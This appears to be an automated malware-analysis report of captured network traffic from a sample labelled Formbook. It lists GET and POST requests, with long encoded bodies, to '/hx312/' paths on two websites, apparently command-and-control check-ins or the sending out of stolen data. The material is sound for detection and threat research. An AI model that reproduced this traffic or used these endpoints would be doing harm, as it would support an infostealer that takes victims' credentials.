3mRrK(-1iWE9mMs8wHhvr0myVOsNweTS-ajGwK8H9Xr1pb6cBWDB3cCXqwg8sPVt1c_DRM2P69L6SjErf3kYGRtTZfj2Ckcpv(jQh2eaca74I7yA3n6pRguiTXFQyFMPg4uRHv6CxyE1R(xzYO9DR~qXcMucOBMU5HArfDphxzszpr6bSbngvtZI81O7CB4ILp7mUhLuUxSy5rNNn(iv_Lw7utdmkL64RDiuGlP1unjBIX8Hw0pJq~EWVEhRpvMYpvPbjFFp4LshVREqwn_wcnjC-TGt0KlhM0fCH6KnWl9AunF9MseOPK3lCD2qQvsMKkaBmdxFkiaq8LRye64gDF5kOxFUZYahIhXj58G7RbZPrIHGeS9TbTpJGg5TEIdwf9rZxiuuN~er3CDQf1-4iBPIN(ktjqTP-esQvnX1bPhNSdAGhE9QkUtYDlI7svqDdy7VLCHyTkzHQlcg3U6wo(Zf9WimL3GZWCe1M7ZpOAbbCcVL6D6gF80mcnBt8OS8vKrXYwhcY5k7EJmS5gjp8otudroiEvliV8Mo2HiCcHZ(A7T5Uu8hehBqJxblGTNxz7kckRLeJRUzfAXn0ry6gyFMdjQIA6UHVM3H51h7gQd48bp2gZx~ss4G-X8IDTnItyNNwIHNOtQiIMeB4vpR_3u2T56jd2Ws42TUO8JdVoNDfBnVptfQwEaljgLGHShn6hhB5c9v4EKgjo3Fu0hJ1wLmREZbDCMe35arl(51OQPqm0uUMt94D16tG(CTHd77NEtkLFx9ej0J8UGSCeglNx0ggUcVaVY5FZ5t6~9Tojj3Hct8hY1B0osBCPAthK0Je53qiD2gmBe31O3425ss1Hs~CqLEmNQPMd7qkVCIC0HJrkJL4WSeDhKvl40MloRXDRchbypd4QfYg1Hrx8KoY4ITNreEOKauxbBKsvPwXs5l2ZfDUY6FhgSBO9BAMCCWRruxo1v46wS8pmdGBtZA8xn06Ozqbn8luiatMUyEaskdr~6YnRgvNxjN6WZQjtsbWDb7-UM6EPAcyeslU7vmV4j3zoQwRUzeCMUNAHXtftGflQViTt_zOd2LxWX094aRn9eaM48j225YvxawFfJ6O6aXXKr2COs5nzVlTrCq0x7Vxa4w0liKxdwad4nJqZSX3DWWOOZSei3wHO0kmLVBHmJRucZxyYyCRXrzTRWQLV94

http://www.dancestudiodirector.com/hx312/?qR-LpBOP=Y5pvVCX7OX9eDMScDGEH4uUuC0xa60qK3FLL9C+LAzyQExAF4hhrJQAk/VQzsXlu2CpBJvya&SVj0xL=yj94pdThzhv
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=Y5pvVCX7OX9eDMScDGEH4uUuC0xa60qK3FLL9C+LAzyQExAF4hhrJQAk/VQzsXlu2CpBJvya&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.dancestudiodirector.com/hx312/
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.dancestudiodirector.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dancestudiodirector.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=QblVLlSCakldDrWSLRZdqI9MUUR0tXe-zlK5hBCWLD2IJxND6QpEVkdKzjkksxVqtQxORajN2jtC3e6j6cPL~-og6FSdj_oTvd9zA-KTgz9dcy3yhX67iTvnUJzye-xz9OtJl34RO8oPsxAXCB0Wp-Vr~zpxjHe-jkDo7HtzSiCJ9YyWtUlD5lrGAbKyDsa_8y4L6bk7yZdaX3mU2AfRi1aw7BsCGUJnQCy7v07gm72I(lLtEfAZ99jfUDG4hJmI0xlfe0UkP9V3loP8RDvdKOHVbmqUoY92TPomzvuzGK(egRNve1siGKX9bZiWmoKPnXwvZUWVENKv4d25h3HHm7~jKMtV(UxucMoz1DgvTrDyIHa5n5eSAghO5yfWsA4upWqiDvb8iSzpTdiHBmKWVQa6s2mvXcS3upFL7F9g86PA4ENXbw43FWsGDeJFGFZefsWgxHo-(LR0L8Re4M51(HtmaxsOQy(1MT7Q3BiNswSbaj2coz0cBRrqGlTLyEoE~FaGFfEZnj~NJYx-~j6dkmiik-oTUQWjzB1vy8DsRcIKra4V5dHNwcVfSJZhKgoL2jrmNwwvgc7hXwlaUCYZV_jrHJ5KfYo6BGDYLbTMD3bWYkzGFNcooHlSvFT2NrhkJWeZCuZ9oFJLM-YfLFKnBOyjBNss~r1DCYeRIFyafqi5nOVajxmQth8t0wlPl0Q4THBr5UIRP694b9PaVSrlWWGqYf~lsl1aHc~4pMklaIXAonF-yddTmm(d76qQCSQKCTl728N5jM8iBvdqocQlz4WG1f75rKnBJ93ZlJsIa_A-mby69JcbWWGOVDAEhhnFsZ2o51iU3xikv9P3XViNPs1wwAN4wua3D4aoSLFvRBbEPvr2Ol9ZTdvtJbK-FnxMO9RnPGZ9FTbayA6-QSQj5cVtQiSpniT7GFf_J8G_g_D3JsLZanat4gYeqdRU3gehmN(y46iuANBCMEpUzTBxaryqyYep0mxD94NWM8xFayfTKQJKhOw_X6ip8_XoTFtclAqFTEGUXQVQBZtus2o3wazNvI~r0KX9GthPiMgFtO(jt8hCGFWFxChhpaz70eT_B6W08nlBy-vnIJJwsOA3Gcvt7UscjiZyNgfq0YvSLkWtwrHEM16NpflvSB3z~_SRlmqGr3AI5WHdBYVzMYNpdZUelI(lP-Ca1QANSzx3eCp2MKmddBE4VfPVDBnk18C_Yx21h5qyf5ouv9i7C5tv2JWSTt3gF-uYiztP(u7eL12MiS5dGZ(xgYrDhMEEyd1Koqzvd3z-F7GcEPaq1V54twy2Aq3QuTQb~WjWLiHiWRWIhhQN(7UfHAqx1Z(tMP4q936gndczuQyYdROJRFu_4GH5JIqoQVhwVHFSRvFtGQ4SEC7AS1t-Rha7sPvlWlzD9rQTG2mh5DKI4Vorl5TOWeY1F81JaqStiYe4aBxjlQcVZRMUi0rFYogi7dSFT7LK(NE7UEFXJzHM5XTmofL0ux92o-F1oetIMHVYTtb6GonDowTtM5FkLB46Fx6QQvB9Z6o8wIQacBtRF-YEpN3Ac2Q5lc9zf83cNbOaEBI3z5QeDI1j3pu-XU0b9Q5x2SWH1qt7uh~1em5WXiHv~vKHQdav4hMjMDw98_QEHLr4(SAdIUWExfF0QrpmlJl6cN4Q4uvHtQpNAs794T3n5_xexhORT6Dj2GQgmrJ-NvODb-VqifKS37i2Hp63z48IP6QIsqTDNCAqrn4iYRxYpdL3pYGoUj(ySbkcotWitK7EQXjoxtOHt1cfSZvEQDYw72QQJq(Pp9~8iMWEfZ~frsb6(l~GV4NlhhE-XACMGPOBqWt5i6mVgADBvq2-Tdbg2j43Kmtw7Wt524EuHV1dZJtARa7kktwWT8N0lHyAy0GWmfz7s6Bt4_jHsqBAqdzTxMu8yEvRJz5EW0XAUDLKi3lVzjdGaXpgQcBE0o0VzBgbbfLRlNXacyuUaTxaETHGB0RYYPEz5Ey7cV4DuxcnFBsdP0~70oc4Wy30ozcqOKJj01F6G6KWd2P4BUkq5PsKri2paRpZaWwah-OrBWi63uAqjM9XW9B88TgD3n0wjpx2WnblFVyA9rEvFC(2nzaKt3EYBjLYOR7f9c6Cz7rSwQAZL0UoxQrrjdp_WsPAhrBrxwpaE0lU9t5-4Z69D2~BQwO1(qIJY1z9NOEe\x00\x00\x00\x00\x00\x00\x00\x00

http://www.dancestudiodirector.com/hx312/
  • Hostname: www.dancestudiodirector.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.dancestudiodirector.com
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.dancestudiodirector.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.dancestudiodirector.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=QblVLkb5fVRAU5voBwoQvps0MUF6zw6BtiHShCKSDnqaOQ9Dr29HYkdN4Dkn6BRegixGRbnj2gNBuMSc4-nc2OVT1kzBn5sQv4swF-~T9TZfCwvTkiSNgzzheobrXoxCvbd3i21fK8A-pQBwBngK3fxqxUg6igOUih2v~Hk5M2WDtYSktRE_1BX7VsW_cOCvrlYL5rcrmLVYTHGMyTH8kASVxgcFKkpgXArwh1(bgPKcxS3_UPEShdzyfQWth4LU4SRHaREfc6lrqYuDBy7VK-3_EnuUxYd8A9Br~vuYKq3srxNTe1Y6ccz5U5iMiqfD2HZoMGPSF4mv4-uUn1vE(b~8JccDoUdncM5q7TovdJXyCHK6oZeSOwh25yfesA4UpSTtAuj8kRnrVru3Hw6iIAa2tzK1TYjSuvUU1FBg4KjB6m0ePx40KEwWK-RVGFFlepmC1jsj~LR1Eo108Phpy3d1HCcfVGfbM3bT5CyB~jmpSDyq4wEQCg6AQWnD(W9yvVfxC7FusCWDJrpeuWDeuGO3wts7RRmc5QNCyoD4JOwehakC6ujBhJ5CIvJjIB4OnAb9EgIms8niBUVlUiA3D63DAp1BddkcLHLSP8nESE~0V2jOJ9gLiF8j2wTFLLllBSafNoVeiGB-OdpsU3GXf9apTtwa9uQ6MZq6Z2mvbKWAr7sfuFe0nj1-5F51o1IqRn5UxUgmMoRBfPyvaFDea0nIRra9tX9zHdGkp8glbIzAlEt9y_0Z(G(fmqq2fCdpCRE638J5i-ksAohk5-MCuoWO3e328aGzJ-aa3aoYMMAxt6TzwpccQED2Ezc3vB2YspjvgUvR1zLhrq7yHkmOZcVJhQxq6_GQWJHtfcp_Zj7IKLTmMkVrc-XGC5q5UCIRIMA2fFULNxTR5W2mRwxA7cAxMQKin0GsEFmVIcqRpqTpQ573VT6l(xBUqvhA2BTiueLptL24IdVjPFEn3R8bYf~Jx4TGp3ZOm4tYBtpgcjWxMyYJ~bB0IITGuc7SCnMXtS32IH(qWH9lNpVS~lFo5NblsZLV6rCeJ-B0h8Ywh9zSrKxQEUrSqlFT5Y~t5fLJeYf_311Ahf3oFYMD46IfAbrI3h5OpBhCNl7A18nSLUetzbnEYEm0nO4oTzjD3OnEzFuYk1YT(E(UQtslYMBNMfMgyIrsFZbM3gI_CEdQeGR2NpDpWFMVWeTCTxPC0tuRPzSh1aWfWst_4taxfMt-ivKGAsLLX-~VjRpByIHvKkKctWAVHbnsiovdsd80wZcSrIK2EWHzTYvFIZvAxjxwjxblZ4qQyhcT7mLVGnDnTynxjnZdvfYzKDvR0IfiVt0S5E~pxto1kEzrZySdF0WT3AHQXIWYPzpGTmgQRN5wGB0afhGAK3NJRE~6n_O8Z2XSvO0ANkL3tzucnVtt1qSOO65ZG_xrWv6wo4jffUIWjXgzL3EJsFjrfog3t97Sd9(K(Mg_TgoVIAT84CuSrZfVmU539MdRvcZSAmxCZevSFIOKh3HbBp9sDhIMTCuyXbxiPYUWyZYLOBN5d-kEs-vbUXBUj8FvbMHmLYOWBF8_z_IZDocj6ZazLkwC(RYizzy-(K14gwGBGkZ4SUDvmOWYZ-u7yD4tNCw5pM0TRoHB(idGNBWI6elaOOJggpNqN8ERzOqmhQtvMsfhzgfo9fMG7lLwRKD57CRw07NgNrLxZJRhidaRu5iDHbqx7dh8O5J3oMGWBDgui1IhCiIsg5On05DBG13qR60bluCCrIf_Smyv1_u9hQwKCYD3W28m6EAMF7(6t9eBuuKmZ7qS5-Tt0FjOYIl4zSoqQB64NMLW(DBSkJWBjAv6lba4Npf49yE4BzpouhIx0M0uD2NaJJheGLi_r9FiOdN6h2u60TCtm-zEqJRa45LB5qByneCopfHA9iqRM2Z5f1bhVATyon9VmxYnJSdZGL545PxEnx5rb83U1PncL0qGcDlPEivrE0dnaNoy2nelTlEfi10PEAQEYkX1nK4EWyfdkWcHEb177k82EoWmckrRA1wSuul50HWBHgc3bFsUi7WRenSU(uEtp_94WOpK4SAB0GZtvKRYYm3eHFe3j_AvOFbjgnSf21UALz3RCEzOipKBi-zu5AcIWUQJ(zbNlageOp(Mw4p8jgJXWHNWsZxdqIblOh6TS3aUwctFKSz6EbV_pWOXiCWNBWF0mnlxKAWjILqBluDZIIxuq2nHCP7EDwSn5hTBJxHN(4IJ95svmmzLdxzfGPLd1p7BcONwhuh1XV8MWzYW86QPNE1GLo9-LSZLK9U2A_nBOJw-TqDDcBdToodleHCPwzSJBV4gVyk4iEq_2W7ulfA69eh5AeZmzRAR1TqHxmoxI2mQU

http://www.cityforliving.net/hx312/?qR-LpBOP=wgM2NFuiCWCG9LUJ95rOA3Ky7YFHBPCpFPEoHCuHM8tOH0E4ZE+YuIy8M6EtnHvqUx5LWU5v&SVj0xL=yj94pdThzhv
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=wgM2NFuiCWCG9LUJ95rOA3Ky7YFHBPCpFPEoHCuHM8tOH0E4ZE+YuIy8M6EtnHvqUx5LWU5v&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.cityforliving.net
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.cityforliving.net/hx312/
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.cityforliving.net
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.cityforliving.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cityforliving.net/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=4CAMTgjAe12jvrYc4OqzCjDI(KQQIOqKe69YNTW8b8FfQGQqV1e64O(SNuk2mU3wBT9ARDcV0S5zeCLUZyIiUT6KkpX64rXWB51smtb2LTAYVuDsvSzHjYCs53GT~FzF4xhZ~hd2lOB5XShTEhSo0psq2lFTis2CddfnBaF2Ol86VnlK9nqJu4iHCR0MVZOVjISalnf0C8ahmJJlD_0aWg(7dMUeSEVRsTNOcnMPOHwMYQ~ekisZ(XEivA6BRBO8i44jJeCN4cu2z3LjagJkIfBuNBWDvh3qBuS27ZJOKXwU9tk2jojmIaoTXmakYT5mCK2ZhwWK0Py14aIWtXvrMfLWoGofaNRRBMD6OGc8BXJQdKSY6bxIIjXPK9QJdlD1i7VsCcSO2lvArpRnYMErZKMu3eP9EP2Q6mlHAG7CLkpTyNa8uJODW17km965rJ~IdfdZG6hn0r1InkGHSMkqaEiRVMoYQKP6v2Ksbe904B3Jr3axqkbzrfv6wMae1ZjHtjdTvf~hbaRfK9J1V5fTl0KxWa5IBlMgj510f5NNWC~muisWPuAgWi8HYCQIfXTHGoF7Q6r9J0SJuiB2d-Eu2GNgZkjM5usqapbIHtxvIVi8kqrs65IDwOd5RERGbfvsT-oCKQyT0ff1U1KiB84g5fdxQFchpvovxuxQ6qgertrM53sA0zWUlJSgoAUoSc~H3r9Dcx6ueRZK7tQ7~y~9AorDyDjJ(JihKAStYUCD3GQzSqmm7D6QR5p9(9bKKjZzOcx97_7so_JGsxNgu0vgZCNVdUvxtwp_tyHN(zIVqtvGpNCskNbZBEMJq4AbxJaJfxRU6q0OMfnhJuBPpUN8Ud~MKAmtgLP5WsN0ujCVvyKkfVkn7rpSRsrX(yo0sOJNeFCc19F_g-afjIRws8Lr8SatRaqWh6NGqqzqpAoc~o8Vn5GMkjX-Ci~_YPnVT1R0f7urLOWcDGv9lheShlqsT_ySqx6-Xi4mB35DmDmzT_W31thnw5eUm-u1Sl(Fs55Uy55dvP(15wqn5rpkamSAxAVQyP2f(Blder6dHhIm1pLkfotfwFYEjbi8JA98rvCyLLt_DLTUB_E9oM3zrJL3VxCWpXSs4Zru7ICozM(Z6G8onPTFGKqWdhafjqJ7EajkdSJeX6QushgJaue4(J2hFeDej-Bu(_Yt5stazSydMDLBUJ7LQxE61QXLZwFqKKQ3(2FAHjf9Hgj3CNOJCmRdTrS8EpN5CG9MkNo9RQpnW7aMQdP_f6gtTH47uM~VVZjB25QF9Ti3p6n8~AiGxXF_XMGz4YQubRLlZLsY3wEwXRzPt0RzB3MNMLj4vKZqGUOwI_vJOqd2qkX4MvqVavul399ekYxck5BgLDKQDHLIy72XRLwVA5ELFX2LfK0GKgZIsXo3bcxrGRofcd(99uxWM9PYCCXlZgI8i4TIDGBFhXOqfH0ze1c6KJU5Sb5dBx7WjQCRucDVFttGn3Xdb8tSXQAOL7A-47K3wtC8Sr(JPymB1zN5YS1TNqRVACj9MiD9nm51yuz6euuw1d8S5ht2UX9gG7Ip3SAe2TXt9OzBjQg75wgBw7S79quqrWk4eNEG9gVo8vUFp31jgBJ2ZKkEx1fqnwADiALYJdFtGp2tjvxFRGLp0UmRsWgSVEz6TRVOZCS6rOM5CvlX5vAL5HvM(wp81l8eyubyT5Lq7ae1~_RthzZz5NQj2fZvhejaIqAYi-iP0YfvqpXrce~NSDC8cIb_qK5_HG8QwiwNODf7xMELvRUIhW0-dXfxf-L27AiDBDw1cEyS6yJQJqnYmyFiaOA9DlCHn0BM0CZQSTBvLnFpwnec7OJu1WA3PL41ZAbjrgTMsYcQSwAo4oOHVJipvx1ECWYtkCYxUPmktvZePo4ld5LKUdXDImD9mwI9mjMIjRHt2rBCtAykoOuQ8H5H5bTd06E9RZybaDCO3mj3SymmwkDPV6tRCXJl~YXOt3RsLUtlj1qmqa7Y(KjSy9t5epMV(gIJoV3arbBDLSWNtiTzQpGUdK97KfpmMunB62bSj0Er7xPQ8nHniInmHqnWJoHacqyJYMVnYSftYuwzh5q3zszNO_CU3RPsIBiIEsw1cFKqdV(zovBuklG_~g7qgnqQfGnWW2aInOfiUHMC9BhkoogVKZHqfJLI2UwxErC6H3Umfhpucawu\x00BQwO1(q

http://www.cityforliving.net/hx312/
  • Hostname: www.cityforliving.net
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.cityforliving.net
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.cityforliving.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.cityforliving.net/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=4CAMThbycFyQruEj8P6jfXGp0aUaWt7uTKdiNSm4ANV3HmAqTwyDxO(VPuk13EqQDB9IRCI_0TBwQGHRfRg1Yj2ymprZvZ(JBbI9jpn2WQceINrztnbLi4OixS7fxW74qjtd3A9ShKE3Vzh3FDCe65opiTUajLnxceHvP7tlNkIgQ3Fo9mew2pSyKyl0LaGjpvKaiUOpKbu_jKB9CMcrUQvCNtkjNndWixVeBWI0dW4ASjWI0y5U2nUfoByYRVGlsasrHbSY9rvk4GqaXnx8IvRUHiGDhRXzCsL6mpJtZHoY3NkejoXQJo0fYGaiV1JTJObf2l6a3ei148kB8h70D_KIqW5fRaZKBMSjImU8ATlQYuyb4bxIGDXaK9Q7dlDci5E-DcaOwlDCo8d9efYfWKMi0cq4XbC46nwaAmHCJQZQncKwobmAeV~7vdz-rJ67ceM6BfB2m71HzkKYE9kmT1S7ar1gS-fQsWOjb9Bw7BbnmXeh8n2youfn0N28qYO7sH9DneTIKIBvLM5FRYbP5F2ee8xaEl8PmNpZetEEdg2IqCgBZM08EwMaGwcOZz3EEfp8Jaj4I0eo4GYRabsQyUlAJXHH7rYUA7K_R-Q7eGmgp4LdnacwickAKW1-a-qHe8gYJ22o~ZTEN27dN-UA34xoXFBRqroe9fV7~MpMo6S21FAI9Ca0ivfBuSsefcXW7qkxUyaZSkhz(ZMHyQjrVqLc(zyE4-GcKAa5YEWD0HkzWpOl7i6XfJp3iNbWXzVROa8kpsXsuP5EvylupmzXGyNnfQf6pwJotwKa8z0vgOfJsMiWnNbeBmYi6IMS(sSnfnNEw_c4KZyqL_BOs1ZxQcfhLgq_paypOZF6wDze3jCoRVQZ3PhaM_D8knErofd9OhSA~NQFufqE3rZ39e7VjiWGPt(GhIFm9qrLog97nqoDpZrV2DKrGzm4Y-PJRUtWIe2gVrHHKmjmkjrpw2XGSvb0rR(feDwrYwtZn0y0Vs2e2INx9YyO7sOTTAvV7oha0Llq6JzW7DX178UfCle85T05xf6u4AwpQ56mEWMf34OcZahz(wxjk6qefGdVw_qiXrNmMYiUCd0Ys-LL(7XTBDTCsH6zuork7JSOyuDZ92kok9LFLo~_TwWNiZtbJqWmNERAVcE9gSYCN6b-wIOZOt38nPUgos1x9d4v2hyqMArBUu70bw9a2UmUQwN9Q6wguzdUL3zATAzxKvODHgYlcZDgGYRjBz1V7-cCWSxGRqn5T-fPe4YaMHspntGHY5mTtaYt1DWAiJforAGA2lYyZ5ivwY03VUTTc6UD5yUqCGX7iWVuBm9GV8DZo65lIC3df57-Z6p4n0zeRf3JIKjI7_IgpINC48IbSHLQAkbZxuWPV4NKbrl7F2(JabUJHxVd7WsOfvgkL1oDROT65Nx5HtTqeUOmUkML5ofsHUF9tgaANEAmQD5ZLJUSHbhzOzbWjRnancX6FchMnkPga-MARUUPdJIG9_Li8NGzD57tJl7IuAlLSCsgPoJFECOcBzX-ikFu99TrR-OY6tASqgNXZ2tAFbglqTwwwRXq4PSOjS1z4QIe5NO82qq34DxyYp163AdZ2-cxmGtFuTx2H74A(S3A7GRCjDjccPgvRozG2PtRFAT113ujpn0uSkrMeTcESinZpuBqWYFbvJUEkwmInB4f6186wOOkSJH47fa-tMZqhyRy1_Rt3sJfnfTnPsVl1NCjkJ(r~LnwS83zFSzoRa2evI93GjZH2BU9fR6Px4hWoCE29UMVQFbgZPT_rzCPHwEmYFTo3Vh-EozZlw95Rus-CQ2Wo2M9zDgqbSA4AF9gnVem3vlj(ms9R5IYRRzgjxbEpfQXVFwouaqKcJ~FoRdecGU4qTZQedSekppld9MabNPLUcz_RmDPklkpuH10tyz3sepgm0DAloKSxXxHzda8(oFvUeKwAwzfn27UURaj2hnJcpYOHDol9srvmSpTUGBktQy0oN7d2K2X9cR_Qs4p9DduoUPF1OARMibHwADgWabbcbxeK-tebJztlT~tuRcWqxLw7i3C(Z7EAKjVO6WHc8KgcPd9Y2W0UMhm2qvRvsulQreUhCSmBwadJa0tKl3ceg~FsO99lizgkkiK~HuLQgz0alOyvaH1ViIN5mdjpP8XN6vyOK6g2SshJ8KdF0BVDw00ecBA9-oexS99JfDg8YFAF83FK3p-G_dGhmpNZzsidT(vDu5s4pn2Ex0nI9CeKlbL9w3O2OdT7a72XpJUXWo48_4tBf8wlH(JHVFPQFlEYcQCnC4vDNW2jD89AoYiCyGjTvz3JMoZh5t23QAVtY8BWZcm67j630CEw0fRpMXi(o5gdakfQmNHkQ7k2Oz97JIM8znqNAjusYMKKy6

#infosec #automation

TheSystem Itself @ 2018-11-13 00:09:20

Detected family: #Formbook

TheSystem Itself @ 2018-11-13 00:14:03